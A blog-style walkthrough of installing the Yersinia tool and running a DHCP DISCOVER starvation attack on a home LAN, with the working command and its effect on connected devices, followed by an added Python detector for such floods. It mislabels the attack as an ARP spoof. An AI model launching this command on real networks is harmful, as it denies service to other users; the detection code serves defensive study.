Installing and using yersinia

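Honestly, it's a bit embarrassing that I only recently came across this tool. There isn't much material about it online, so I'm writing this up, partly for my own reference.
I'm on Fedora 25, so dnf install yersinia was all it took to install. For some reason, though, yersinia's GTK-based graphical interface won't open, which is a bit annoying, so I'll just do everything from the command line.
First you need a LAN (otherwise the sample has no effect). Run ifconfig to look at your network cards and note the interface name.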

[root@102 laplacence]# ifconfig
enp3s0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
ether 44:8a:5b:f0:ac:e3 txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
device interrupt 19

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 71 bytes 7207 (7.0 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 71 bytes 7207 (7.0 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

virbr0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
inet 192.168.122.1 netmask 255.255.255.0 broadcast 192.168.122.255
ether 52:54:00:8d:e3:86 txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

wlp5s0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.3.104 netmask 255.255.255.0 broadcast 192.168.3.255
inet6 fe80::e4a:c8f:aed6:53bf prefixlen 64 scopeid 0x20<link>
ether f0:42:1c:e1:2c:56 txqueuelen 1000 (Ethernet)
RX packets 77859 bytes 97739807 (93.2 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1006468 bytes 299830684 (285.9 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

I'm currently on the network through wlp5s0, so I quietly noted down that interface; it will be needed later.

[root@102 laplacence]# yersinia -h

Usage: yersinia [-hVGIDd] [-l logfile] [-c conffile] protocol [protocol_options]
-V Program version.
-h This help screen.
-G Graphical mode (GTK).
-I Interactive mode (ncurses).
-D Daemon mode.
-d Debug.
-l logfile Select logfile.
-c conffile Select config file.
protocol One of the following: cdp, dhcp, dot1q, dot1x, dtp, hsrp, isl, mpls, stp, vtp.

Try 'yersinia protocol -h' to see protocol_options help

Please, see the man page for a full list of options and many examples.
Send your bugs & suggestions to the Yersinia developers <yersinia@yersinia.net>



MOTD: Who dares wins

Hmm, a very *nix-style help screen.
Let's test an ARP spoof. Following the help, fill in the protocol:

[root@102 laplacence]# yersinia dhcp -h

Usage: yersinia dhcp [-h -M] [-attack id] [-source arg] [-dest arg] [-ipsource arg] [-ipdest arg] [-sport arg] [-dport arg] [-opcode arg] [-htype arg] [-hlen arg] [-hops arg] [-xid arg] [-secs arg] [-flags arg] [-ci arg] [-yi arg] [-si arg] [-gi arg] [-ch arg] [-interface arg]
-h This help screen.
-M Disable MAC address spoofing.

Use '?' as parameter argument if you would like to display the parameter help.

Please, see the man page for a full list of options and many examples.
Send your bugs & suggestions to the Yersinia developers <yersinia@yersinia.net>



MOTD: Do you have an ISL capable Cisco switch? Share it!! ;)

Next comes -attack and its argument:

[root@102 laplacence]# yersinia dhcp -attack ?
<0> NONDOS attack sending RAW packet
<1> DOS attack sending DISCOVER packet
<2> NONDOS attack creating DHCP rogue server
<3> DOS attack sending RELEASE packet


MOTD: Ghosts'n'Goblins, Trojan, Out Run, Bump'n'jump, Side Arms...

Here 1 will do; it's only a sample, after all.

[root@102 laplacence]# yersinia dhcp -attack 1 -interface wlp5s0
<*> Starting DOS attack sending DISCOVER packet...
<*> Press any key to stop the attack <*>

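Because the router can only be controlled via UPnP, there was no way to get into it once the attack started, so I could only judge the result by the symptoms. The result: both phones dropped off the network, and about 5 s into the attack (this router's DHCP pool has only 99 addresses) even the attacking machine itself went offline. The wired connection (probably static) seemed unaffected.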
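
A defender-side check for the DISCOVER flood shown above, added here as an example that is not part of the original post: it scans DHCP server logs and flags an interface when many distinct client hardware addresses send DISCOVER within a few seconds. The log line shape (ISC dhcpd style with an ISO timestamp), the host name gw, the interface br-lan and the thresholds are assumptions, and the sample log is constructed.

```python
import re
from collections import deque
from datetime import datetime, timedelta

# Assumed log shape: ISO timestamp, host, then an ISC dhcpd-style message.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) \S+ dhcpd\[\d+\]: DHCPDISCOVER from "
    r"(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2}) via (?P<ifc>[^\s:]+)",
    re.IGNORECASE,
)

def detect_discover_flood(lines, window_s=5, max_macs=20):
    """Return one (interface, timestamp, distinct_macs) alert per interface, raised
    when more than max_macs distinct clients send DISCOVER within window_s seconds."""
    window = timedelta(seconds=window_s)
    recent = {}      # interface -> deque of (timestamp, mac) inside the window
    alerted = set()  # interfaces already reported
    alerts = []
    for line in lines:  # lines are assumed to be in chronological order
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # not a DISCOVER line
        ts = datetime.fromisoformat(m["ts"])
        q = recent.setdefault(m["ifc"], deque())
        q.append((ts, m["mac"].lower()))
        while ts - q[0][0] > window:  # drop entries older than the window
            q.popleft()
        distinct = len({mac for _, mac in q})
        if distinct > max_macs and m["ifc"] not in alerted:
            alerted.add(m["ifc"])
            alerts.append((m["ifc"], m["ts"], distinct))
    return alerts

def sample_log():
    """Constructed sample: one client retrying every 4 s, then 99 new MACs in 2 s."""
    base = datetime(2017, 3, 1, 10, 0, 0)
    fmt = "{} gw dhcpd[812]: DHCPDISCOVER from {} via br-lan"
    quiet = [fmt.format((base + timedelta(seconds=4 * i)).isoformat(),
                        "02:00:00:00:00:01") for i in range(10)]
    flood = [fmt.format((base + timedelta(seconds=60, milliseconds=20 * i)).isoformat(),
                        "02:aa:00:00:00:%02x" % i) for i in range(99)]
    return quiet + flood

if __name__ == "__main__":
    for ifc, ts, n in detect_discover_flood(sample_log()):
        print(f"{ts} {ifc}: {n} distinct DISCOVER clients within 5 s")
```

A log check like this only reports the flood; on managed switches, DHCP snooping with a per-port rate limit and port security (a cap on MAC addresses per port) stop it at the access port.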